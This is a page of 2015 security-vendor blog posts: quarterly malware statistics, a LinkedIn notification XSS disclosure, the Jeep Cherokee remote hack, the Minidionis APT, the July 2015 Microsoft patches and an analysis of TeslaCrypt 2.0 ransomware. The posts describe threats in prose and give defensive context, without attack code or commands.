The rating of exploits has seen little change from the first quarter. The Browsers category (60%) maintained its top position in the Q2 2015. Currently most exploit packs contain a pack of exploits for Adobe Flash Player and Internet Explorer. It is worth mentioning the growing number of exploits for Adobe Flash Player (up by six percentage points) which is caused by the large number of spam mass mailings containing malicious PDF documents.

The number of exploits for Java continues to decrease (down four percentage points): in Q2 we did not see any new exploits for Java.

In the second quarter of 2015 we registered the use of four new vulnerabilities in Adobe Flash Player:

  • CVE-2015-3113
  • CVE-2015-3104
  • CVE-2015-3105
  • CVE-2015-3090

Although the share of exploits for Adobe Flash Player in our rating is only 3%, there are many more of them in the “wild”. When considering these statistics, we should take into account that Kaspersky Lab technologies detect exploits at various stages. The Browsers category also includes detection of landing pages that “distribute” exploits. According to our observations, they are most often exploits for Adobe Flash Player

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

Online threats in the banking sector

In the second quarter of 2015, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on the computers of 755,642 users. This figure represents an 18.7% decrease compared to the previous quarter (735,428).

There were 5,903,377 registered notifications about attempted financial malware infections #KLReport

Tweet

A total of 5,903,377 notifications of malicious activity by programs designed to steal money via online access to bank accounts were registered by Kaspersky Lab security solutions in Q2 2015.

Number of computers attacked by financial malware, Q2 2015

Geography of attacks

In the second quarter of 2015, we changed the methodology used to create the rating of countries affected by the malicious activity of banking Trojans. In our previous reports, the Top 10 was made using the number of users attacked. Although this aspect is very important, it depends on the number Kaspersky Lab product users in the countries.

To evaluate and compare the degree of risk of being infected by banking Trojans which user computers are exposed to worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this threat during the reporting period in the country, of all users of our products in this county.

Geography of banking malware attacks in Q2 2015 (the percentage of users attacked)

Top 10 countries by the percentage of users attacked

  Country* % of users attacked ** 1 Singapore 5.28% 2 Switzerland 4.16% 3 Brazil 4.07% 4 Australia 3.95% 5 Hong Kong 3.66% 6 Turkey 3.64% 7 New Zealand 3.28% 8 South Africa 3.13% 9 Lebanon 3.10% 10 UAE 3.04%

* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000)
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country

In Q2 2015, Singapore took the lead in the percentage of Kaspersky Lab users attacked by banking Trojans. Noticeably, most countries in the TOP 10 have a high level of technological and banking system development, which draws the attention of cybercriminals.

In Russia, 0.75% users encountered banking Trojans at least once during the quarter, in the US – 0.89%, in Spain – 2.02%, in the UK – 1.58%, in Italy – 1.57% , in Germany – 1.16%.

The TOP 10 banking malware families

The table below shows the Top 10 malicious programs most commonly used in Q2 of 2015 to attack online banking users, based on the number of users attacked:

  Name Number of notifications Number of users attacked 1 Trojan-Downloader.Win32.Upatre 3888061 419940 2 Trojan-Spy.Win32.Zbot 889737 177665 3 Trojan-Banker.Win32.ChePro 264534 68467 4 Backdoor.Win32.Caphaw 72128 25923 5 Trojan-Banker.Win32.Banbra 56755 24964 6 Trojan.Win32.Tinba 175729 22942 7 Trojan-Banker.AndroidOS.Marcher 60819 19782 8 Trojan-Banker.AndroidOS.Faketoken 43848 13446 9 Trojan-Banker.Win32.Banker 23225 9209 10 Trojan-Banker.Win32.Agent 28658 8713

The majority of the Top 10 malicious programs work by injecting random HTML code in the web page displayed by the browser and intercepting any payment data entered by the user in the original or inserted web forms.

The Top 3 banking malicious programs remain unchanged from the previous quarter. Trojan-Downloader.Win32.Upatre kept its leading position in the rating. Malicious programs in this family are relatively simple and no larger than 3.5 KB. They usually download a Trojan-Banker belonging to a family known as Dyre/Dyzap/Dyreza. The list of financial institutions attacked by the banker Trojan depends on the configuration file that is downloaded from the Command-and-Control center.

In Q2 2015, the new banking Trojans entered the rating – Backdoor.Win32.Caphaw, Trojan-Banker.AndroidOS.Marcher and Trojan-Banker.AndroidOS.Faketoken.

Backdoor.Win32.Caphaw was first detected in 2011. It utilizes the Man-in-the-Browser technique to steal online banking credentials of the customers.

Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher attack Android-based mobile devices. Faketoken works in partnership with computer Trojans. To distribute this malware, cybercriminals use social engineering techniques. When a user visits his online banking account, the Trojan modifies the page, asking him to download an Android application which is allegedly required to securely confirm the transaction. In fact the link leads to the Faketoken application.

Once Faketoken is on the user’s smartphone, the cybercriminals gain access to the user’s banking account via the computer infected with a banking Trojan and the compromised mobile device allows them to intercept the one-time confirmation code (mTAN). The second mobile Trojan is Trojan-Banker.AndroidOS.Marcher. After infecting a device, the malware tracks the launch of just two apps – the mobile banking customer of one of the European banks and Google Play. If the user starts Google Play, Marcher displays a false window requesting credit card data which then go to the fraudsters. The same method is used by the Trojan if the user starts the banking application.

Financial threats

Financial threats are not limited to banker malware that attacks online banking customers.

Financial malware: distribution by malware type

In Q2 2015, the proportion of banking malware increased from 71% to 83% compared with the previous quarter. The second most widespread financial threat was Bitcoin miners – malicious software that uses computing resources of the victim’s computer to generate bitcoins. In the previous quarter, this category of malware was in third place. Of note is the fact that some legitimate software developers secretly integrate Bitcoin-miners in their applications.

Top 20 malicious objects detected online

In the second quarter of 2015, Kaspersky Lab’s web antivirus detected 26,084,253 unique malicious objects: scripts, exploits, executable files, etc.

Kaspersky Lab detected and repelled a total of 379,972,834 malicious attacks from online resources #KLReport

Tweet

We identified the 20 most active malicious objects involved in online attacks against users’ computers. These 20 accounted for 96.5% of all attacks on the Internet.

Top 20 malicious objects detected online

  Name* % of all attacks** 1 AdWare.JS.Agent.bg 47.66% 2 Malicious URL 32.11% 3 Trojan.Script.Generic 4.34% 4 AdWare.Script.Generic 4.12% 5 Trojan.Script.Iframer 3.99% 6 AdWare.JS.Agent.bt 0.74% 7 Exploit.Script.Blocker 0.56% 8 Trojan.Win32.Generic 0.49% 9 AdWare.AndroidOS.Xynyin.a 0.49% 10 Trojan-Downloader.Win32.Generic 0.37% 11 Trojan-Ransom.JS.Blocker.a 0.34% 12 Trojan-Clicker.JS.Agent.pq 0.23% 13 AdWare.JS.Agent.an 0.20% 14 AdWare.JS.Agent.by 0.19% 15 Trojan.Win32.Invader 0.12% 16 Trojan-Downloader.Win32.Genome.qhcr 0.11% 17 AdWare.Win32.Amonetize.ague 0.11% 18 AdWare.Win32.MultiPlug.nnnn 0.10% 19 AdWare.NSIS.Agent.cv 0.09% 20 Trojan-Downloader.Script.Generic 0.09%

* These statistics represent the detection verdicts of the web antivirus module. Information was provided by users of Kaspersky Lab products who consented to share their local statistical data.
** The percentage of all web attacks recorded on the computers of unique users.

The Top 20 is largely made up of verdicts assigned to objects used in drive-by attacks, as well as adware programs.

Aggressive distribution of advertising programs affected the rating: 10 out of 20 positions were occupied by advert-related objects. In first place is the script AdWare.JS.Agent.bg which is implemented by inserting adware in arbitrary web pages. It could even push down Malicious URL, the verdict we use for the links from the black list which are ranked second in Q2 2015.

Of interest is the appearance of the AdWare.AndroidOS.Xynyin.a verdict – it’s unusual to see a verdict for Android malware in the rankings for malware on users’ computers. The program corresponding to this verdict is an advertising module for Android which is embedded in different applications (for example, in programs “accelerating” the work of the phone). One such application was popular in March and April of this year when it was actively downloaded by users. Since Google Play does not provide such applications these applications were downloaded from the Internet mostly via the victims’ computers.

The Trojan-Ransom.JS.Blocker.a verdict is a script which tries to block the browser using a periodic page update and displays the message asking the victim to pay a “fine” to the specified e-wallet for viewing inappropriate material. The script is mostly encountered on porn sites.

Top 10 countries where online resources are seeded with malware

The following stats are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2015, Kaspersky Lab solutions blocked 379,972,834 attacks launched from web resources located in various countries around the world. 89% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

Distribution of web attack sources by country, Q2 2015

Russia (51%) maintained its leadership: this country’s share increased by 11.27%. Switzerland left the Top 10. Singapore came eighth in the ranking with 1.56% of all web attacks.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculate the percentage of Kaspersky Lab users in each country who encounter detection verdicts on their machines during the quarter. The resulting data provide an indication of the aggressiveness of the environment in which computers work in different countries.

  Country* % unique users attacked** 1 Russia 38.98% 2 Kazakhstan 37.70% 3 Ukraine 35.75% 4 Syria 34.36% 5 Belarus 33.02% 6 Azerbaijan 32.16% 7 Thailand 31.56% 8 Georgia 31.44% 9 Moldova 31.09% 10 Vietnam 30.83% 11 Armenia 30.19% 12 Kyrgyzstan 29.32% 13 Croatia 29.16% 14 Algeria 28.85% 15 Qatar 28.47% 16 China 27.70% 17 Mongolia 27.27% 18 Makedonia 26.67% 19 Bosnia and Herzegovina 25.86% 20 Greece 25.78%

These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In Q2 2015, Russia, which was second in the first quarter, regained its top position in the ranking. Since the previous quarter, UAE, Latvia, Tajikistan, Tunisia and Bulgaria have left the Top 20. The newcomers to the rankings were Syria, which rocketed to fourth place (34.36%); Thailand, which was in seventh place (31.56%); Vietnam, in tenth place (30.83%); China (27.70%) and Macedonia (26.67%), which occupied 16th and 18th places respectively.

23.9% of computers connected to the Internet globally were subjected to at least 1 web attack in Q2 #KLReport

Tweet

The countries with the safest online surfing environments included Argentina (13.2%), the Netherlands (12.5%), Korea (12.4%), Sweden (11.8%), Paraguay (10.2%) and Denmark (10.1%).

On average, 23.9% of computers connected to the Internet globally were subjected to at least one web attack during the three months.

Local threats

Local infection statistics for users computers are a very important indicator: they reflect threats that have penetrated computer systems using means other than the Internet, email, or network ports.

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2015, Kaspersky Lab’s file antivirus modules detected 110,731,713 unique malicious and potentially unwanted objects.

Top 20 malicious objects detected on users computers   Name* % unique users attacked** 1 DangerousObject.Multi.Generic 22.64% 2 Trojan.Win32.Generic 15.05% 3 Trojan.WinLNK.StartPage.gena 8.28% 4 AdWare.Script.Generic 7.41% 5 Adware.NSIS.ConvertAd.heur 5.57% 6 WebToolbar.Win32.Agent.azm 4.48% 7 WebToolbar.JS.Condonit.a 4.42% 8 Trojan-Downloader.Win32.Generic 3.65% 9 Downloader.Win32.MediaGet.elo 3.39% 10 Trojan.Win32.AutoRun.gen 3.29% 11 Downloader.Win32.Agent.bxib 3.26% 12 WebToolbar.JS.CroRi.b 3.09% 13 RiskTool.Win32.BackupMyPC.a 3.07% 14 Virus.Win32.Sality.gen 2.86% 15 Worm.VBS.Dinihou.r 2.84% 16 WebToolbar.Win32.MyWebSearch.si 2.83% 17 DangerousPattern.Multi.Generic 2.75% 18 AdWare.NSIS.Zaitu.heur 2.70% 19 AdWare.BAT.Clicker.af 2.67% 20 AdWare.Win32.MultiPlug.heur 2.54%

* These statistics are compiled from malware detection verdicts generated by the on-access and on-demand scanner modules on the computers of those users running Kaspersky Lab products who have consented to submit their statistical data.
** The proportion of individual users on whose computers the antivirus module detected these objects as a percentage of all individual users of Kaspersky Lab products on whose computers a file antivirus detection was triggered.

In line with the established practice, this ranking represents the verdicts assigned to adware programs or their components (such as AdWare.BAT.Clicker.af), and to worms distributed on removable drives.

The only virus in the rankings – Virus.Win32.Sality.gen – continues to lose ground. The proportion of user machines infected by this virus has been diminishing for a long time. In Q2 2015, Sality was in 14th place with 2.86%, a 0.32% decrease compared to the previous quarter.

Countries where users faced the highest risk of local infection

For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Top 20 countries with the highest levels of computer infection

  Country* % unique users** 1 Bangladesh 60.53% 2 Vietnam 59.77% 3 Pakistan 58.79% 4 Mongolia 58.59% 5 Georgia 57.86% 6 Somali 57.22% 7 Nepal 55.90% 8 Afghanistan 55.62% 9 Algeria 55.44% 10 Armenia 55.39% 11 Russia 54.94% 12 Laos 54.77% 13 Iraq 54.64% 14 Kazakhstan 54.23% 15 Syria 53.00% 16 Tunisia 53.75% 17 Ethiopia 53.44% 18 Ruanda 53.17% 19 Ukraine 53.01% 20 Cambodia 52.88%

These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.

In Q2 2015, Bangladesh (60.53%) took the lead as the country with the highest level of computer infection, pushing down Vietnam which has headed the rating for almost two years. Pakistan (58.79%) rocketed from 13th position in the previous quarter to 3rd place in Q2.

The newcomers in the rankings were Georgia (5th position with 57.8%), Russia (11th position with 55%), Tunisia (16th position with 53.7%) and Ukraine (19th position with 53%).

An average of 40% of computers globally faced at least 1 local threat during Q2 2015 #KLReport

Tweet

The safest countries in terms of local infection risks were Sweden (19.7%), Denmark (18.4%) and Japan (15.5%).

An average of 40% of computers globally faced at least one local threat during Q2 2015, which is 0.2% percentage points more than in Q1 2015.

Kaspersky researchers warns Linkedin from potential spear phishing

Thu, 07/23/2015 - 07:59

On November 14, 2014, security researchers from Kaspersky Lab warned LinkedIn, the world’s largest business-oriented social network, about a security issue that could pose a major threat to its 360+ million users. Because LinkedIn attracts so many people in the business community, a security flaw such as this one could help attackers to efficiently execute spear phishing campaigns, steal credentials and potentially gain remote control over selected victims without needing to resort to social engineering.

Linkedin engaged to remediate the threat and had since issued a fix to the vulnerable platform.

“While certain HTML content should be restricted and we have issued a fix and thanked Kaspersky researchers; the likelihood of exploit on popular modern email platforms is unlikely.” says David Cintz, Senior Technical Program Manager at Linkedin security ecosystem.

Researchers found the vulnerability after noticing escape character differences when posting comments from different devices in various posts. The second alert was a malfunction in the platform’s back-end parser that simply interpreted a CRLF (“Enter” keystroke) to an HTML tag <br />, appending it to the post as text. The two were not connected to each other, but they both raised important questions.

Although it may sound like not that big of a deal, a tiny malfunction like this attracts the attention of attackers. Looking at those two behaviors, researchers were convinced that something was not right. It seems like no one had noticed it. It took a trained eye to assemble the pieces of the puzzle.

ENTER keystroke being interpreted to plain-text <br /> element

Submitting multiple posts from a web browser had successfully imitated part of the behavior of the escape character differences, but there was no lead on how to bypass the anti-Cross-site Scripting (XSS) engine and generate an attack.

Further research led to a major discovery. There was a reason why the output from one device was not encoded the same as the other.

Submitting comments with HTML tags from the web platform generated %3C as the less-than character, while the same input from a mobile device was encoded to &lt;. Further inspections led to the presence of two different platforms. But that did not mean that the web platform was vulnerable. Or did it?

Another interesting insight was that every comment to a post is sent via an email platform to all other users who were part of the thread. The differences in the body of that email confirmed our suspicions. The following screenshots illustrate the two scenarios:

A comment posted from the website with a proper escape

A comment posted from the mobile application without an escape

That proved that two different email platforms exist and that mobile notifications could help to deliver a malicious payload without any user-supplied input validations.

Signed email bounced from Linkedin regardless of its content

Social platforms are a big target for hackers. Companies in general are hit by white hat hackers on a daily basis, trying to get a piece of the internet security pie. But what if a black hat hacker finds the issue?

Looking at the following chart, we can assess how this type of security issue might give an attacker a big chunk of the solution to the problem of how to distribute malicious software under the guise of a legitimate social platform notification.

Generic Malware Distribution Cycle

Malware authors invest a lot of time in achieving each of these milestones. Every step has a big impact on the overall outcome: solid programming that can adapt to multiple systems/devices, packers and binders, obfuscation and encryption, combining reconnaissance with the right distribution method and finding the right zero-day or exploit to remotely control the system.

To save valuable time, attackers find clever ways to approach authors and purchase their needs for each milestone, as if they were goods in a store. Finalizing the shopping list to cook up this type of attack might cost a lot. A business-oriented social platform that gives details of millions of business men and women, along with their titles, colleagues, career information and more, could be extremely valuable. It’s not difficult to target a user, and exploiting that information is just a single comment away.

Choose your victim

Injecting a malicious comment into a user’s post thread will automatically launch a notification to his email account, regardless of the email provider or connection hierarchy between the victim and the attacker.

Although it seems that the application server had escaped the dangerous characters, the payload is only escaped from the main application. The email template is sent as it is.

Injecting malicious payload via mobile application

In the worst case scenario, if an email provider fails to properly escape the content of an incoming email, the attacker can leverage the issue to execute a malicious JavaScript injection attack, also known as Stored XSS.

Another scenario might involve using an associated HTML form to collect information about the victim or redirect the victim to a site where a malicious executable can be downloaded.

Example scenario – stealing credentials

Last November Kaspersky Lab researchers contacted Linkedin’s security team, and informed them about the issue. The platform was fixed and the threat has been mitigated.

How to prevent yourself from becoming a victim:

  1. Use an advanced Internet Security solution to filter out dangerous redirections to servers that contain malware, phishing and more. If a solution is already installed, keep it updated at all times.
  2. Opening an attachment or following a link in an email – even from a known party – might contain malicious content. Be very wary before making the decision to open it.
  3. Do not register to social platforms with your corporate email account.

Acknowledges:

Jonathan Jaquez – CEO, Mageni.net

David Cintz – Sr. Technical Program Manager, Linkedin

Zero day exploits: now available for cars

Thu, 07/23/2015 - 06:18

The day before yesterday was an important day for the information security industry. Investigators announced exploitation of the first ever 0-day vulnerability for cars. The wireless attack was demonstrated on a Jeep Cherokee.

Charlie Miller and Chris Valasek found the vulnerability in the onboard computer of the car. People have been talking for a long time about attacks on such systems if the attackers have access to a diagnostics jack. However a remote attack on a car’s critical systems remained a purely theoretical scenario about which experts have warned for a long time (including experts from Kaspersky Lab). Many hoped that the car manufacturers would recognise the risk of such vulnerabilities being exploited and take preventive measures. Well, we overestimated them.

The investigators gained access through the onboard entertainment system not only to non-critical settings but also the car’s controls like brakes and accelerator. The investigators plan to publish the technical details of the hack in August but the overall scheme of things is already known.

Car Hack

To start with, the air conditioner, radio and windscreen wipers went crazy and the driver could do nothing about it. And then the car itself. The accelerator and brakes of the Jeep responded only to the remote investigators and not to the car’s owner at the wheel.

It is important here to note that the car had not been modified. All the above was carried out using a vulnerability in the onboard Uconnect system, which handles contact with the outside world via the infrastructure of the Sprint cell operator in cars of the FCA auto-group (Chrysler, Dodge, Fiat, Jeep and Ram). It is enough to know the external IP-address of the victim to rewrite the code in the head unit of the car (more about these units a bit later).

The company has already released a patch for Uconnect, which can be installed either at official dealers, or, for the technically minded, independently via a USB-port. At the moment the investigators can see a vehicle’s VIN, GPS coordinates and IP address by connecting to the Sprint network and using the 0-day exploit they found. By the way, to find the specific vehicle among the 471 thousand vehicles with Uconnect on board is, according to the investigators, rather difficult.

A conceptual defence

This is not the first incident showing the insufficient safety mechanisms built in to modern cars as standard. Before this we saw the local seizure of the steering through the OBD-II diagnostic port and an illicit software update through a false cell base station.

Both the operating system manufacturers and the car manufacturers are now implementing important and necessary but insufficient cyber security measures. The situation is made worse by the fact that the architecture of the onboard electronic networks of vehicles was developed in the 80s, when the idea that a car would be connected to the Internet was something out of science fiction. And, consequently, although the electronic components are reliable and functionally safe the same can not be said about their cyber-security. Here at Kaspersky Lab, as in the case with conventional computer networks, we are convinced that complete multi-level safety will only be achieved by a combination of the right architecture, developed taking into account all risks, including cyber-risks, the correct setup of pre-established equipment and the use of specialised solutions.

Architecture

The Kaspersky Lab approach is based on two fundamental architectural principles: isolation and controlled communications.

Isolation guarantees that two independent entities can in no way affect each other. For example, entertainment applications will not be able to affect the technical network. Not on board an aircraft and not in a car.

Control of communications guarantees that two independent entities which should work together for the system to function will do so strictly in accordance with the safety and security policy. For instance the system for acquisition of telemetry and sending it to the service centre can only read data about the condition of the car but not transfer control signals. This sort of control would have been of great help to our Jeep owner.

The use of cryptography and authentication for the transfer and receipt of information within and from outside are also indispensable parts of a protected system. But, judging by the results of the investigators, Jeep either used weak vulnerable algorithms or the cryptography was implemented with errors or not implemented at all.

The described approach — isolation and control of communications – comes naturally to a micro-kernel operating system with controlled inter-process interaction. Each logical domain has its own address space and all contact between domains is always carried out via a safety monitor.

Products

Of the onboard electronics controlling critically important functions of the vehicle and theoretically open to attack the key elements are the head unit (HU) and the electronic control units (ECU), which form a whole network of controllers. There are control blocks for the engine, transmission, suspension etc.

Head units work on real time operating systems (RTOS) such as QNX, VxWorks and others. Kaspersky Lab intends to offer its own protected operating system for head units after obtaining the necessary certificates.

Both of the architectural principles mentioned above (isolation and control of communications) are fundamental principles of KasperskyOS — a safe micro-kernel operating system with controlled inter-process interaction.

The operating system was created from scratch and security was its main priority from the word go. This is the main difference between our product and the operating systems now installed in cars. We called a key component of our safe operating system the Kaspersky Security System (KSS)

During operation this system has responsibility for calculating a verdict on the security of any given event happening in the system. On the basis of this verdict the kernel of the operating system takes a decision to allow or block the event or inter-process communication. With the help of the KSS it is possible to control any activity — access to ports, files, network resources via specific applications etc. At the moment KSS works on PikeOS and Linux.

The software on the electronic control blocks is only small blocks of code and for these Kaspersky Lab intends to cooperate with microelectronics firms to jointly guarantee the safety of this embedded software.

In place of a conclusion

We really don’t want to deny ourselves the comforts which the computerisation of cars has brought. However if car manufacturers don’t start taking the problem of the cyber-security of their Internet-connected cars seriously and don’t start demanding that car component manufacturers do the same then people who are concerned about safety will have to switch to classic cars. Yes old cars don’t have computers. Yes they don’t have computer-controlled fuel injection, navigation systems, climate control and other modern gadgets. But on the other hand they only obey the person at the wheel.

Minidionis – one more APT with a usage of cloud drives

Thu, 07/16/2015 - 05:12

Yesterday our colleagues from Paloalto networks presented a research uncovering Minidionis (also known by the Kaspersky codename – “CloudLook”). It’s an another backdoor from APT group responsible for other attacks such as CozyDuke , MiniDuke, and CosmicDuke.

Analyzing this malware we noticed that attackers implemented a capability of cloud drive usage to store malware samples and downloading them on infected systems. Almost one year ago, we observed another APT group codenamed “CloudAtlas” (link), also using cloud drives to store the stolen information. And now we see a similar technique in CloudLook/Minidionis.

Minidionis uses multidropper scheme to infect it victims. Usually attacker’s uses spear-phishing emails with a self-extracting archive pretending to be a voicemail. When victim opens an archive the second stage dropper executes and a .wav file plays looking like a real voicemail. Also attackers were using a self-extracting archive containing a PDF file luring it’s victims with information regarding world terrorism:

After successful execution the second stage dropper of Minidionis malware uses Onedrive cloud storage to download payload from:

The malware maps an Onecloud storage drive as network drive using hardcoded login and password, and then copies files that stored in cloud to the local system:

Could this approach become a mainstream? It’s quite possible, because it gives the attackers a simple method of hiding malicious behavior – detection of to-the-cloud malicious traffic is more complicated as it means also blocking legitimate services.

According to Kaspersky Security Network, every single attack using Minidionis/CloudLook backdoors was specifically crafted for a particular target. This indicates that the attacks are highly customized and focused on value targets. So far, we’ve observed several targets, most notably in diplomatic organizations from Europe.

Kaspersky Lab detects all known samples of Minidionis/CloudLook as Trojan.Win32.Generic, and successfully protects its users against the threat.

Microsoft Security Updates July 2015

Tue, 07/14/2015 - 17:03

Microsoft releases a long list of updates to multiple technologies today with 14 Security Bulletins (MS15-058, MS15-065 – MS15-077) patching 58 vulnerabilities, and at least 47 of them reported through a a responsible disclosure channel. Meanwhile, several are being used and detected ITW as a part of limited targeted attacks, like the Microsoft Office RCE cve-2015-2424, ATMFD.DLL EoP cve-2015-2387, and the Internet Explorer JScript9 RCE cve-2015-2419. Some were the result of breach leaks as well. A number of these have a very attractive offensive utility to defend against, so expect to see these exploits being used and re-used. Most of the July updates fall under two main categories, and the updated technologies are listed below. All of the Windows versions from Windows 7 and up maintain a critical RCE vulnerability of one sort or another. Update ASAP.

Remote code execution vulnerabilities

  • Windows Server Hyper-V
  • Windows DLL Handling
  • SQL Server
  • Internet Explorer
  • VBScript Engine
  • Remote Desktop Protocol (RDP)
  • Microsoft Office

Elevation of privilege vulnerabilities

  • Windows Graphics Component
  • Windows Kernel (win32k.sys)
  • Windows Installer Service
  • OLE
  • Windows Remote Procedure Call Service
  • Windows ATM Font Driver
  • SQL Server

Vulnerabilities falling under other categories like XSS filter bypass, information disclosure, ASLR bypass, authentication spoofing

  • Internet Explorer
  • Microsoft Excel
  • Netlogon
  • Windows Kernel (win32k.sys)

The most interesting of these vulnerabilities includes the RDP RCE and the Hyper-V RCE. The RDP vulnerability affects even the stripped down Windows Server 2012 Server Core installation, and seems to have been reported by an anonymous source unusually wanting no credit for a remotely exploitable critical vulnerability for a service that is often externally exposed. While Microsoft is doubtful that remote code execution is reliable, they at least acknowledge the possibility. In the past, their denial had been corrected by researchers on the potential for heap feng shei leading to exploitation of certain services, including the 2010 bug in their IIS FTPsvc.

Another couple are the Hyper-V RCE, which are buffer overflow cve-2015-2361 in the Storvsp.sys driver and an unusual “data structure vulnerability” cve-2015-2362 present in Vmicrdv.dll, Vmicvss.dll, Vmicshutdown.dll, Vmictimesync.dll, Vmicheartbeat.dll, and Vmickvpexchange.dll, available across Windows Hyper-V on Windows Server 2008, Windows Server 2008 R2, Windows 8 and Windows Server 2012, and Windows 8.1 and Windows Server 2012 R2. These were both found by an internal Microsoft engineer. Much like the Cloudburst exploit from years ago on VMWare, these enable code with execution escape from a virtual guest operating system into the host system.

Full list of July cve being updated here:

cve-2015-1729
cve-2015-1733
cve-2015-1738
cve-2015-1761
cve-2015-1762
cve-2015-1763
cve-2015-1767
cve-2015-2361
cve-2015-2362
cve-2015-2363
cve-2015-2364
cve-2015-2365
cve-2015-2366
cve-2015-2367
cve-2015-2368
cve-2015-2369
cve-2015-2370
cve-2015-2371
cve-2015-2372
cve-2015-2373
cve-2015-2374
cve-2015-2375
cve-2015-2376
cve-2015-2377
cve-2015-2378
cve-2015-2379
cve-2015-2380
cve-2015-2381
cve-2015-2382
cve-2015-2383
cve-2015-2384
cve-2015-2385
cve-2015-2387
cve-2015-2388
cve-2015-2389
cve-2015-2390
cve-2015-2391
cve-2015-2397
cve-2015-2398
cve-2015-2401
cve-2015-2402
cve-2015-2403
cve-2015-2404
cve-2015-2406
cve-2015-2408
cve-2015-2410
cve-2015-2411
cve-2015-2412
cve-2015-2413
cve-2015-2414
cve-2015-2415
cve-2015-2416
cve-2015-2417
cve-2015-2419
cve-2015-2421
cve-2015-2422
cve-2015-2424
cve-2015-2425

TeslaCrypt 2.0 disguised as CryptoWall

Tue, 07/14/2015 - 06:59

The TeslaCrypt family of ransomware encryptors is a relatively new threat: its samples were first detected in February 2015. Since then the malware has been widely portrayed in mass media as the ‘curse’ of computer gamers because it targets many game-related file types (game saves, user profiles, etc.). The Trojan’s targets have included people in the US, Germany, Spain and other countries.

TeslaCrypt is still in the active development phase: in the past months, its appearance, the name shown to victims (the malware can mimic CryptoLocker and has used the names TeslaCrypt and AlphaCrypt), extensions of encrypted files (.ecc, .ezz, .exx), as well as implementation details, have all changed.

Kaspersky Lab recently discovered the latest version of the Trojan – TeslaCrypt 2.0. This version is different from previous ones in that it uses a significantly improved encryption scheme, which means that it is currently impossible to decrypt files affected by TeslaCrypt. It also uses an HTML page instead of a GUI. Incidentally, the HTML page was copied from another Trojan – Cryptowall.

Kaspersky Lab products detect malware from the TeslaCrypt family as Trojan-Ransom.Win32.Bitman. The latest version of the Trojan that is discussed in this paper is detected as Trojan-Ransom.Win32.Bitman.tk, its MD5-hash: 1dd542bf3c1781df9a335f74eacc82a4

Evolution of the threat

Each TeslaCrypt sample has an internal version of the malware. The first sample we found was version 0.2.5. It had borrowed its graphical interface, including the window header, from another encrypting ransomware program – CryptoLocker.

TeslaCrypt 0.2.5

By version 0.4.0, the developers of TeslaCrypt had completely changed the malware’s appearance.

TeslaCrypt 0.4.0

The following features of the malware family remain the same, regardless of the version:

  • The Trojan independently generates a new, unique Bitcoin address and a private key for it. The address is used both as a victim ID and to receive payments from the victim.
  • The AES-256-CBC algorithm is used to encrypt files; all files are encrypted with the same key.
  • Files larger than 0x10000000 bytes (~268 MB) are not encrypted.
  • C&C servers are located on the Tor network; the malware communicates with the C&Cs via public tor2web services.
  • Files encrypted by the malware include many extensions matching files used in computer games.
  • The Trojan deletes shadow copies.
  • In spite of the scary stories about RSA-2048 shown to victims, this encryption algorithm is not used by the malware in any form.
  • The Trojan was written in C++, built using Microsoft’s compiler, with cryptographic algorithm implementation taken from the OpenSSL library.
Notable facts
  • Early versions of TeslaCrypt (0.2.5 – 0.3.x) were designed to check whether a bitcoin payment had been successfully made on the site http://blockchain.info. If the payment was received, the malware reported this to the command server and received a key to decrypt the files. This scheme was vulnerable, since an expert could send a request to the C&C and get the necessary key without making a payment.
  • Versions 0.2.5 – 0.3.x saved the decryption key (with other data) in their own service file, key.dat. The area containing the key was zeroed out in the file only after completing encryption, making it possible to save the key by interrupting the encryptor’s operation (e.g., by turning off the computer). After this, the key could be extracted from key.dat and used to decrypt all files.
  • In version 0.4.0 the file key.dat was renamed to storage.bin, and the decryption key was not stored openly but as a multiplicative inverse modulo the order of the standard elliptic curve secp256k1. On completing encryption, the key was overwritten with random bytes rather than zeros, but it was still possible to extract the key before the area was overwritten. This was implemented in our RakhniDecryptor utility.
The present

Recently a sample of the Trojan with internal version 2.0.0 caught our attention. So what was different this time?

The first thing that caught the eye was that TeslaCrypt no longer has code responsible for rendering the GUI (the application window). Instead, after encrypting the files the Trojan opens an HTML page in the browser. The page was fully copied from another infamous ransomware program – CryptoWall 3.0.

The page that opens when a victim follows one of the links provided by the cybercriminals is also identical to the CryptoWall payment page, with one exception: the URLs lead to a TeslaCrypt server – the authors of the malware were certainly not going to let their rivals get their victims’ money.

TeslaCrypt initializes a string with text about CryptoWall

Why use this false front? We can only guess – perhaps the attackers wanted to impress the gravity of the situation on their victims: files encrypted by CryptoWall still cannot be decrypted, which is not true of many TeslaCrypt infections.

